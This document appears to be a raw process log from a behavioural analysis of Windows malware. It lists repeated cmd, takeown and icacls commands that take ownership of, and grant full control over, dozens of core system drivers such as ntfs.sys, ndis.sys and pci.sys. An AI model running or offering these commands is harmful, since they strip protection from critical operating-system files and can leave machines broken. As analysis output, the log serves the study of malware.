\??\C:\Windows\system32\conhost.exe "-1875839783-101674710-21206595310683095251553938424-513787364-2020172696529053742"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\luafv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\lsi_scsi.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-421257773-107903637612763017851224111572868958809-4277414401550677392-1237189876"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mcd.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\megasas.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\modem.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1272926511256057651619662679-15378853531628847387-17186653311449761317-1763510734"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\MegaSR.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\monitor.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\MegaSR.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mouclass.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mountmgr.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mouhid.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mpio.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mpsdrv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mrxdav.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-597254599-1014725756473908762229268642-538575378-930973824762501954-911413304"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mrxsmb10.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mrxsmb20.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mrxsmb.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msdsm.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msdsm.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msahci.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msfs.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-20621623411721852919122253140020123865251964571712-859231476-890467221-1648627992"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mshidkmdf.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msahci.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-7019528492008964746-5870177413925332017171212-5727012812004133945-1521351256"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msisadrv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msiscsi.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mskssrv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mspclock.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mspqm.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msrpc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-10997163601569684253-17467807801771241839-13647391111317801935589771890-112358574"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mstee.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\MTConfig.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mssmbios.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-213156078-1996365688-10966522071727713418-13636028471254570044111215650-734728131"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mup.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndis.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "165376506217837802421645267530-501660593-1591914369-1214045799-2787664221842437973"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndistapi.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndiscap.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-309367601-163961517-667651548147849758318464985244645805144489250181574956016"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\netio.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\nfrd960.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndisuio.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\netbt.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndiswan.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\netbios.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndproxy.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\netio.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\nfrd960.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1974602893606122958-346756638-1695695580-20321026031509357016-1222065264857229623"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\npfs.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-610781453-1249305474407930359-49520347-15259825201714916674140023396-2074788050"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\netbt.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\nvraid.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\nsiproxy.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\nvstor.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ntfs.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\nwifi.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\nvstor.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ntfs.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\null.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pacer.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ohci1394.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\NV_AGP.SYS

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\parport.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\nwifi.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pacer.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\null.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ohci1394.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\parport.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "4428478501669851411-1365921823-916050662132873005-1926146010-1429192626788847017"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "20264024911477878713648573333-88764455-1635712181-931430753-1965142311503546454"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2103508941-1824432873196082802-375751675-235256267-7534048201212831771333141954"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-64973338017514169728635020402026387003-508959132-1705140655-2145240462-1447772014"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\partmgr.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-113759881701528827-771996901-28408127316127370811198585857352781531404517891"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pciide.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\processr.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pci.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2096386945179440311511064089732492458599533496916920237-7735785512098552780"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ql40xx.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "440838600370986110167620281316525249-1093858355-680032847-21318170591557336318"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1157288444-6379013061381134183451959604141640713-16272647791233587357-2107031312"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-246807676-1195048877-1128864945-15771191028286452131318057056-1974028940-1406164790"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pciidex.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rasacd.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "15843006-21330954791909491404206882636976015541006900066-99706399939971792"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\raspppoe.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1559754747-833770423574312401317226582927888177823489035-1663728426539184575"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdpbus.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdbss.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit

